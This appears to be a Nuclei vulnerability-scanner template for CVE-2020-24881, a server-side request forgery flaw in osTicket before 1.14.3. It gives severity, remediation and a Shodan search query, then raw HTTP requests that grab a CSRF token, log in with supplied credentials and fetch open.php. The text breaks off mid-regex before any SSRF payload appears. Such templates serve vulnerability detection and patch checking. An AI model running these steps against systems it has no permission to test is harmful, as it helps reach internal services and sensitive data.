id: CVE-2020-24881
info:
name: OsTicket < 1.14.3 - Server Side Request Forgery
author: hnd3884
severity: critical
description: |
SSRF vulnerability exists in osTicket before 1.14.3, allowing an attacker to add malicious files to the server or perform port scanning.
impact: |
Authenticated attackers can perform SSRF attacks to scan internal ports, access internal services, or retrieve sensitive information from internal systems.
remediation: |
Upgrade to osTicket version 1.14.3 or later.
reference:
- https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0
- https://nvd.nist.gov/vuln/detail/CVE-2020-24881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-24881
cwe-id: CWE-918
epss-score: 0.73267
epss-percentile: 0.994
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: osticket
product: osticket
shodan-query: title:"osticket"
tags: cve,cve2020,osticket,ssrf,authenticated,vuln
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrf_token}}&luser={{username}}&lpasswd={{password}}
extractors:
- type: regex
name: csrf_token
part: body
group: 1
regex:
- ''
internal: true
- raw:
- |
GET /open.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: option_value
part: body
group: 1
regex:
- 'Select a Help Topic.+?[ \n]+